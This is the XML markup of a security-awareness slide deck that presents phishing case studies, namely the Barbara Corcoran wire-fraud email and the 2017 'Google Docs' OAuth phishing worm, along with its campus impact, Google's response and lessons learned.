            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>We will dive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>into this further when we get to Incident Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592441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C1E1-5E6C-B64C-92C4-4D3CEBBFDAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Case Study: Shark Tank  Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94403564-1F0B-644C-B138-E6EEA46F0D00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.marketwatch.com/story/shark-tanks-barbara-corcoran-fell-for-this-very-common-phishing-scam-and-it-cost-her-almost-400000-2020-02-27</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnn.com/2020/03/02/business/barbara-cocoran-email-hack-money-returned/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72C3D2A-9211-2B4B-BFCD-CC0EBA4FF88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668254" y="3530770"/>
            <a:ext cx="4383504" cy="3294269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2516467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A95E-ECC3-4541-8CF6-F1C020F0CA29}"/>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6B5BC79-7E85-3C44-85FB-F94AEE7AC056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300789" y="108284"/>
            <a:ext cx="7620000" cy="6569242"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>From: CFO &lt;t3h_cfo@gmail.com&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>To: Controller &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>controller@barbaracocoran.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subject: Bank Wire </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Here is the information for the bank wire, please send ASAP!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Amount: $400,000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Account: 1234567890</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SWIFT: AAAABBCCDDD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>IR steps?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Lessons learned?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Process improvement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340851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EB056-7383-A34D-AB3B-F4CF2E0908FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Case Study: ”Google Docs” phish</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E0AC86-D578-DD4C-8492-192A5986297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2179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4FFA-2225-B642-9E2A-6A7450FF30AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D49C4A-7523-CD44-B505-95E33EC90B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250" y="2641600"/>
            <a:ext cx="7327900" cy="2717800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139872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35FA-1B27-054E-8566-47DDFA54DC30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not legit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4B995B-8287-484F-80EF-D99B90F13D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804932"/>
            <a:ext cx="7620000" cy="2391135"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="899993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55EC-A0E3-4F40-B580-E61648D50D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB36EA0-9F84-0C41-96D2-4237B0228DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7F98C1-913F-4349-B016-5DD377584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56" y="1600200"/>
            <a:ext cx="3869364" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3461847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“Google Docs” app</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7362" y="1417638"/>
            <a:ext cx="3692080" cy="4257676"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628651" y="1417638"/>
            <a:ext cx="3587261" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Why does Google allow a 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> party to create an application with the word “Google” in it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Even if “Google” is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Unicode’d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> somehow special to appear as ”Google” why doesn’t Google have a filter in place to block things like that?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2985468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Eugene Popov?</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0944" y="1131094"/>
            <a:ext cx="4983028" cy="3972841"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730028" y="1552626"/>
            <a:ext cx="2426677" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>From ”his” now defunct Twitter account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Coventry University has no listing of a Eugene Popov being registered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2984684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6A0E-EE29-4147-BF41-AB767CD6792E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="-136329"/>
            <a:ext cx="7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://twitter.com/Skvern0/status/1115885488165019650</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27207EAC-BB01-3449-AE70-508C79FE1B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0837" y="716952"/>
            <a:ext cx="6566770" cy="6141048"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170124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Impact on Google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3239897"/>
            <a:ext cx="7886700" cy="123664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936" y="1417638"/>
            <a:ext cx="3768236" cy="1627557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2418143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reddit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> effect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.reddit.com/r/google/comments/692cr4/new_google_docs_phishing_scam_almost_undetectable/</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614" y="2942069"/>
            <a:ext cx="7006736" cy="2547904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2515541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Google did to resolve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invalidated the fake “Google Docs” app which removed it from all users who had added it to their Google account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This occurred within an hour of the first message being sent out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://security.googleblog.com/2017/05/protecting-you-against-phishing.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732823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This attack has been discussed before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="3600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Feb 2017 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.redblue.team/2017/02/abusing-google-app-scripting-through.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sept 2014 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.andrewcantino.com/blog/2014/09/08/example-of-poor-security-communication-in-google-auth-flow/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528452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impact on UMD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>First email sent at 2:30pm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Last email sent at 3:28pm (Google disabled the rogue app)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2,494 messages/minute at the peak (3:06pm)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>40,841 emails in that time span (some are forwards/”hey did you send” this/emails to helpdesk/SOC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>39,854 emails if you remove “Re:”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Fwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:”, some others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Unique users: 1,687  (Note: not all of these are campus users)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1536"/>
            <a:ext cx="9144000" cy="766946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3344963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a:xfrm>
            <a:off x="628650" y="2226469"/>
            <a:ext cx="3996104" cy="3132443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi Factor Authentication would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have prevented this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user was granting a 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party application to their Google account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>We need to better educate our users to enable them to make smart choices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4860" y="2025894"/>
            <a:ext cx="3971925" cy="3095625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2735105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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" lvl="1">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Majority of threats involve user interaction to lead to compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
